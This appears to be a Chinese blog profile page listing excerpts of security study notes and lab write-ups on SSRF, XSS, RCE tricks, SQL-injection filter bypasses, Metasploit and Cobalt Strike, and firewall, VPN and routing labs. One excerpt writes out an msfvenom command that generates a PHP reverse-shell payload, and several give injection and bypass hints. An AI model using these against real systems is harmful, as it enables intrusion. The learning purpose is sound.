自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(61)
  • 收藏
  • 关注

原创 关于SSRF的相关案例(2月公开赛Web-ssrfme)

给info随便赋一个值,出来了php界面,可以观察到hostname主机和端口,而172.21.0.3是可以绕过127.0.0.1这个条件,我们可以在这个地址上测试,不断的改变端口值,端口不一样,出来的值也会有所区别。可以看到有一个过滤条件,它限制了file,dict协议,127.0.0.1和localhost 也不能用,其实就是不想你探测内网端口,也不能读取内网服务文件。只开放了一个80端口,也没有数据库,如果按172.21.0.3路径一直找端口,肯定是不行的。当端口为6379的时候,没有任何区别。

2024-08-25 20:32:09 587

原创 XSS的一些相关案例及DOM破坏的案例

然后就通过下面那个定时器通过id=ok把我传进去的a标签获取到了,但是由于获取到以后定时器就会在两秒后调用tostring方法,所以自己调用href里面的属性整个就会被当做字符串去执行了。先分析一下代码,我发现了submmit这个提交事件,然后这个是在定时器里的,它获取了from表单的id,然后在两秒钟里面进行action的自动提交,而这个action正是from表单action属性。有了以上的例子,我们发现这个自动提交不会有这个麻烦,而且我们直接写在传参里面就可以了这个js语句。

2024-08-17 19:07:06 829

原创 关于RCE的一些奇技淫巧的案例复现及总结

首先下面那个上传的文件会继续post提交,提交到web.php时,虽然不一定会接收但是一定会在临时目录下生成一个php临时文件,然后这个get参数接受到code这个参数接受完这个后就开始走程序,然后走到eval里面去了,然后就是走的是``里面的数据。因为它会自动转码的,当浏览器访问的一瞬间是没进入到程序里面去的,然后浏览器自动url-deco的解码的。然后再进入程序里面去的。这样我们就定位到了临时文件的目录,这里的[@-[]就是@-[也就是ascii码,这个之间的数,去看了发现这之间的就是大写的字母。

2024-08-12 00:00:29 894

原创 贷齐乐错误的waf引起的SQL注入漏洞复现(关于HTTP参数污染的案例)

_REQUEST 遵循php接收方式 ,i_d&i.d中的最后一个参数的.转换为下划线 然后接收 所以我们的正常代码 放在第二个参数 ,waf失效。但是如果取后者,就没有意义了,因为我的注入语句都是在第一个i_d后面跟着的,所以我们要第一个传参去取第二个值,第二个传参去取一个值。去分割我们的带的REQUEST_URI以0开始取的,下一个才是1。它把你的'&', '"', '', '(', ')'弄成了实体编码。然后将来自己的传递的参数传进去,也就submit='bbbb'和i_d=2。

2024-08-11 22:50:41 693

原创 MySQL字符集的转换及MySQL绕过的总结

(2)将 ’ 中的 \ 过滤掉,例如可以构造 %**%5c%5c%27 ,后面的 %5c 会被前面的 %5c 注释掉。(1)greatest(n1,n2,n3,...) //返回其中的最大值 (2)strcmp(str1,str2) //当str1=str2,返回0,当str1>str2,返回1,当str1

2024-08-11 20:32:04 826

原创 msf和cs的使用及实现回弹系统权限的总结

Msfvenom -p php/meterpreter/reverse_tcp LHOST=(本身的ip地址) LPORT=12345(这个是端口号) -o sherrre.php(这个是最终输出的php文件)Exploit是漏洞利用程序,Auxiliary是辅助利用程序(前渗透模块,也是还没做,就像是一个哨兵去探查能不能入侵),post是后渗透模块(也就是将权限拿下来了,想要去做进一步的操作,例如远程连接提权等)Span是互相传递的功能,你把你的shell传递给msf,msf把shell传递给你。

2024-08-10 22:29:36 740

原创 SQL注入(闯关游戏)

我们发现注入点就在uagent这里因为HTTP_USER_AGENT是可控的,是可以更改的,但是要保证自己的账号密码正确才可以走到那里面去,才可以注入。明显这里就看出了与get传参的不同,这里的传参的参数只用了两个,因为之前用的*去查的,现在只是用的是username和password去查的。这个是从cookie里面取的,然后cookie里面的uname是设置的,然后只需要改uname的进行改变就可以了。然后改中间的concat()里面的值,无非就是将里面的user()改了()括号里面写sql语句。

2024-08-05 22:38:09 1366

原创 IPSEC VPN的总结

IPSEC协议簇-- 基于网络层的,应用密码学的安全通信协议组它在ipv6中IPSEC是要求强制使用的,但是,IPV4中作为可选项使用IPSEC可以提供的安全服务可以怎么去答?建议从信息安全要素去靠。机密性 --- 数据加密完整性 --- 防篡改可用性数据源鉴别 --- 身份认证数字证书PSK --- 预共享密钥不可否认性 --- 数据源鉴别重传攻击保护 --- 通过添加序列号 --- 一个一次性的数字 --- 用来防重放攻击例子。

2024-07-31 22:58:39 668

原创 VPN概述

VPN概述需求场景VPN诞生的原因1,物理专线成本高,在位置不固定的情况下,难以实现2,直接将服务器开放到公网,不安全VPN概述虚拟专用网,是指依靠ISP或者其他NSP或者企业自身,构建的专用的安全的数据通信网络,只不过,这个专线网络是逻辑上的,而不是物理上的,所以叫做虚拟专用网。VPN的分类根据建设的单位不同分类企业自建的VPN --- 成本相对较低,因为仅需要支付VPN设备的费用即可,并且,因为设备为企业所有,所以,控制上更具有主动性。

2024-07-28 22:57:08 906

原创 防御保护的总实验---IPSEC VPN的实验

18,我们需要针对办公区用户进行上网行为管理,要求进行URL过滤,要求在上班时间仅能访问教育/科研类,搜索/门户类网站,以及一个www.example.com/working相关URL都可以访问。5,生产区访问DMZ区时,需要进行protal认证,设立生产区用户组织架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab123,首次。链路开启过载保护,保护阈值80%;4,办公区分为市场部和研发部,市场部IP地址固定,访问DMZ区使用匿名认证,研发部需要用户绑定IP地址,访问DMZ区使用免认证;

2024-07-26 22:08:38 1003

原创 URL过滤、DNS过滤和内容过滤的总结

URL过滤、DNS过滤和内容过滤

2024-07-24 18:22:56 945

原创 IPS(入侵防御)和AV(反病毒)的总结

ID --- 区分不同的签名对象 --- 服务器,客户端,服务器和客户端 --- 针对设备的身份 --- 注意,一般我们将发起连接的设备角色认定为客户端,响应连接并提供服务的角色认定为服务器。严重性 --- 该行为一旦爆发之后,对我们网络系统的影响程度的评级协议/应用程序 --- 这种攻击所承载的协议或者应用如果勾选了关联签名,则该签名的命中条件变为规定时间内命中关联签名的次数或者阻断时间注意:报文 --- 逐包检测消息 --- 一次完整的请求和应答的过程被认定为一个消息。

2024-07-21 17:56:53 1119

原创 防火墙的双机热备和带宽管理的总结

VRRP:虚拟路由冗余协议--公有协议,原理同HSRP一致区别:1、多台设备 2、仅master发送hello 3、可以使用物理接口的ip地址来为网关地址 4、抢占默认开启 5、hold time 3sVRRP在一个组内可以存在多台3层设备,存在一个master和多个backup正常产生一个虚拟IP(可以为真实接口ip)和一个虚拟MAC默认每1s来检测一次master是否活动 224.0.0.18 TTL=1 hold time 3s选举规则:先优先级,默认100,大优;

2024-07-18 16:36:25 591

原创 防火墙双机热备带宽管理综合实验

内网就dmz区有服务器,然后下行流量不超过40M就是下行带宽最大40M,DMZ中的每台服务器限制对外提供的最大下行带宽不超过20M也就是说外网用户到DMZ区的下行的服务器每台最大为20M。5,生产区访问DMZ区时,需要进行protal认证,设立生产区用户组织架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab123,首次。链路开启过载保护,保护阈值80%;13,办公区上网用户限制流量不超过100M,其中销售部人员在其基础上限制流量不超过60M,且销售部一共10人,每人限制流量不超过6M。

2024-07-16 14:26:55 683

原创 NAT和智能选路的总结

配置黑洞路由就是会使公网地址池中的地址都生成一条指向其自身的空接口,这里主要是为了应对公网地址和出接口地址不在同一个网段的情况,因为在这种情况下,如果公网用户访问地址池中的公网地址,将可能造成环路,所以,需要通过空接口防环;如果可开启了检测,检测发现目标下一跳不可达,则将使该策略不生效,则直接不匹配流量,数据包将直接走路由表。策略路由 --- PBR --- 策略路由其实也是一种策略,他不仅可以按照现有的路由表进行转发,而且可以根据用户指定的策略进行路由选择的机制,从更多维度决定报文是如何转发的。

2024-07-15 19:45:55 944

原创 防火墙NAT智能选举综合实验

防火墙NAT智能选举5,生产区访问DMZ区时,需要进行protal认证,设立生产区用户组织架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab123,首次。4,办公区分为市场部和研发部,市场部IP地址固定,访问DMZ区使用匿名认证,研发部需要用户绑定IP地址,访问DMZ区使用免认证;1,DMZ区内的服务器,办公区仅能在办公时间内(9:00 - 18:00)可以访问,生产区的设备全天可以访问.10,分公司内部的客户端可以通过域名访问到内部的服务器,公网设备也可以通过域名访问到分公司内部服务器;

2024-07-13 16:17:31 807 1

原创 网络安全概述

勒索病毒、网络空间安全、个人信息外泄、数据泄露、APT攻击(高级持续性威胁)防火墙本质的手段就是包过滤(ACL)零日漏洞0-day就是开发人员自己也没有发现了漏洞水坑攻击:攻击者首先通过猜测(或观察)确定特定目标经常访问的网站,并入侵其中一个或多个网站,植入恶意软件。最后,达到感染目标的目的。手段:1.在浏览器或其他软件上,通常会通过零日漏洞感染网站。2.针对已知漏洞的防御措施是应用最新的软件修补程序来消除允许该网站受到感染的漏洞。用户监控可以帮助确保他们的所有软件都运行最新版本。

2024-07-12 16:43:12 1329

原创 防火墙安全策略用户认证综合实验

4.办公区分为市场部和研发部,研发部IP地址固定,访问DMZ区域使用匿名认证,市场部需要用户绑定IP地址,访问DMZ区使用免认证,游客区人员不固定,不允许访问DMZ区和生产区,统一使用guest用户登录,密码Admin@123,游客仅有访问公司用户网站和上网的权限,门户网站地址10.0.3.10。1.DMZ区内的服务器,办公区仅能在办公时间内(9:00-18:00)可以访问,生产区的设备全天可以访问。2.生产区不允许访问互联网,办公区和游客区允许访问互联网。因为并未对路由器设置nat这里并不能ping通。

2024-07-10 21:41:02 1023

原创 MySql学习笔记和练习

创建职工表以及职工工资表职工表字段:工号,姓名,性别,年龄工资表字段:编号自增,职工工号,基础工资10000通过触发器实现:对职工进行添加时 工资表中也要体现当前职工的信息对职工进行修改时 工资表中也要一并修改当前职工的信息对职工进行解聘时 工资表中也要一并删除当前员工的工资信息。

2024-01-26 19:30:12 313

原创 关于MySQL的基本查询(多表查询等)

select name '姓名',department '院系',c_name '考试科目',grade '成绩' from score,student where student.id=score.stu_id AND (name LIKE '王%' OR name LIKE '张%');INSERT INTO student VALUES( 906,'王六', '男',1988,'计算机系', '湖南省衡阳市');

2024-01-26 19:18:23 875

原创 给openlab搭建web网站

这一步比较关键,之前改了接口什么的的建议改回来不然会一直404找不到服务。创建song和tian用户密码都设置成redhat。

2023-11-18 22:22:02 283

原创 HCIP的企业网三层架构实验

先进行ip地址规划,将pc1与pc3置为vlan2中,pc2与pc4置于vlan3中;sw3与sw4为接入层,只需将连接的终端接口划分到相应的vlan中,然后在其他接口中允许相应流量通过即可;sw1与sw2为汇聚层,先配置二层:先进行链路聚合,然后设置接口类型,配置mstp防止出环,vlan2划分到实例1中,vlan3划分到实例2中,而sw1作为vlan2的主根,作为vlan3的备份根,反之sw2作为vlan2的从根,vlan3的主根;交换机上创建地址池,在对应接口中开启DHCP服务。

2023-08-21 19:03:45 184

原创 HCIP的STP总结

生成树协议:企业网三层架构---》冗余----》线路冗余---》二层桥接环路生成树:在一个二层交换网络中,生成一棵树型结构,逻辑的阻塞部分接口,使得从根到所有的节点仅存在唯一的路径;当最佳路径故障时,自动打开部分阻塞端口,来实现线路备份的作用;生成树在生成过程中,应该尽量的生成一棵星型结构,且最短路径树;存在算法: 802.1D PVST PVST+(CISCO) RSTP(802.1w) MSTP(802.1S)

2023-08-21 18:42:05 396

原创 HCIP的vlan的实验

pc1/3能访问2456。

2023-08-18 21:43:47 106

原创 HCIP的MPLS的实验

r2-vpn-instance-a-af-ipv4]route-distinguisher 1:1 RD值。[r4-bgp-b1]import-route ospf 2 ---把ospf 2重发布进BGP。[r4-ospf-2]import-route bgp ----把BGP重发布进ospf 2。[r2-rip-1]import-route bgp ----把BGP重发布进rip。[r2-bgp-b]import-route rip 1 ---把rip重发布进BGP。

2023-08-15 20:22:57 64

原创 HCIP的关于BGP知识总结

边界网关协议BGP(Border Gateway Protocol)是一种实现自治系统AS(Autonomous System)之间的路由可达,并选择最佳路由的路径矢量路由协议。目前在IPV4环境下主要使用BGPV4,目前市场上也存在BGPV4+,BGPV4+在BGPV4的基础上支持多个地址族,如IPv6。BGP协议本身不产生路由,而是转发本地路由表中来自其他协议生成的路由条目;AS之间正常存在大量的BGP邻居关系,且BGP协议不会计算最佳路径;因此在BGP协议中管理员需要进行策略来干涉选路。

2023-08-15 15:16:32 136

原创 HCIP的BGP基础建邻及其宣告

目录1.题目及其要求2.拓扑3.R1的配置3.1 ip的配置 3.2 bgp的配置​编辑4.R2的配置4.1 ip的配置 4.2 bgp的配置 5.R3的配置3.1 ip的配置 3.2 bgp的配置6.R4的配置6.1 ip的配置6.2 路由6.3bgp的配置7.R5的配置7.1 ip的配置7.2路由7.3bgp的配置8.最终结果

2023-08-10 17:59:55 89

原创 HCIP的重发布实验

【代码】HCIP的重发布实验。

2023-08-09 18:18:56 59

原创 HCIP的OSPF综合实验

r1:r2:r3:r4:r5:r6:r7:r8:r9:r10:r11:r12:

2023-08-07 12:02:14 44

原创 HCIP的OSPF在MGRE上的实验

如 source g 0/0/0。如 source g 0/0/0。如 source g 0/0/0。如 source g 0/0/0。其实可以让source后跟接口。其实可以让source后跟接口。其实可以让source后跟接口。其实可以让source后跟接口。

2023-08-04 18:31:18 86

原创 HCIP的MGRE实验

中心站点配置:创建隧道接口,配置好隧道接口ip地址,定义该隧道为多点gre隧道,该隧道加封装的报头源ip地址,通过NHRP协议来获取加封装的目标ip地址,让本端成为NHRP服务端,设置一个NHRP的工作编号。分支站点配置:创建隧道接口,配置好隧道接口ip地址,源IP地址填写接口编号,因为源ip地址可能会变,加封装的目标ip地址,需要到NHRP中心站点获取,设置一个NHRP的工作编号。内网使用RIP获取路由,通过关闭水平分割来实现路由的全网正常收敛。2.R1-R2、R2-R3、R2-R4之间做好封装。

2023-08-03 17:12:44 49

原创 静态综合实验

目录1.题目2.划分ip 3.关于R1的配置 3.1ip的配置 3.2路由3.3 远程登入 4.关于R2的配置 4.1ip的配置 4.2路由 5.关于R3的配置 5.1ip的配置5.2路由 5.3创建地址池 6.关于R4的配置 6.1ip的配置6.2路由 7.关于R5的配置 7.1ip的配置7.2路由 7.3设置acl 20017.关于R5的配置 7.1ip的配置

2023-08-02 18:15:36 43

原创 hcip的基本知识(三次握手四次断开)

第三次握手:客户端收到服务器的ACK和SYN包后,知道了服务器同意建立连接,此时需要发送连接已建立的消息给服务器;向服务器发送连接建立的确认包ACK,回应服务器的SYN告诉服务器,我们之间已经建立了连接,可以进行数据通信。第二次握手:服务器端收到客户端连接请求包SYN后,向客户端发送确认自己收到其连接请求的确认包ACK,向客户端表明已知道了其连接请求,向客户端发送连接询问请求包SYN,询问客户端是否已经准备好建立连接,进行数据通信;第一次握手:客户端向服务器端发送连接请求包SYN,等待服务器回应;

2023-08-02 15:48:19 65

原创 HCIA的acl实验

r1]aaa[r1-aaa]q[r2]aaa[r2-aaa]q。

2023-07-25 17:13:35 61

原创 HCIA的rip实验

1、RIPV2手工认证--在邻居间设计身份核实的秘钥,以及对传输的路由信息进行加密保障了更新的安全性在与邻居直连的接口上配置即可[r1]interface g0/0/1[r1-GigabitEthernet0/0/1]rip authentication-mode md5 usual 123456 切记:邻居的间秘钥必须完整一致;修改时建议维持原有的倍数关系;5、缺省路由 --边界路由器(连接ISP的路由器)上定义缺省源头信息后,将自动向内网发布通告,使得内部所有路由器自动产生缺省路由指向边界路由器;

2023-07-22 19:01:21 113

原创 HCIA的静态综合实验

目录1.实验内容及其样图2.划分ip​编辑 3.路由器R1的地址及其配置3.1分配ip地址3.2设置下一跳的配置 4.路由器R2的地址及其配置4.1分配ip地址4.2设置下一跳的配置 5.路由器R3的地址及其配置5.1分配ip地址5.2设置下一跳的配置 6.路由器R4的地址及其配置6.1分配ip地址6.2设置下一跳的配置7.路由器R5的地址及其配置7.1分配ip地址7.2设置下一跳的配置

2023-07-22 17:32:38 76

原创 HCIA基础网络配置 搭建DNS服务器并进行访问

DNS:域名解析服务器 通过域名解析成ip地址。域名系统DomainNameSystem,缩写DNS)是互联网的一项服务。它作为将域名和IP地址相互映射的一个分布式数据库,能够使人更方便地访问互联网。本次基础网络配置----DNS服务搭建实验,实现了通过域名进行访问服务器的方法。

2023-07-19 14:05:08 80

原创 静态路由,动态路由和交换机的一些基本知识

静态路由,动态路由和交换机的一些基本知识

2023-01-07 18:25:41 404

原创 静态路由的基本知识

静态路由的基本知识

2023-01-07 17:50:51 495

原创 静态路由实现全网可达

hcia静态路由实现全网可达

2023-01-04 22:14:12 189

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除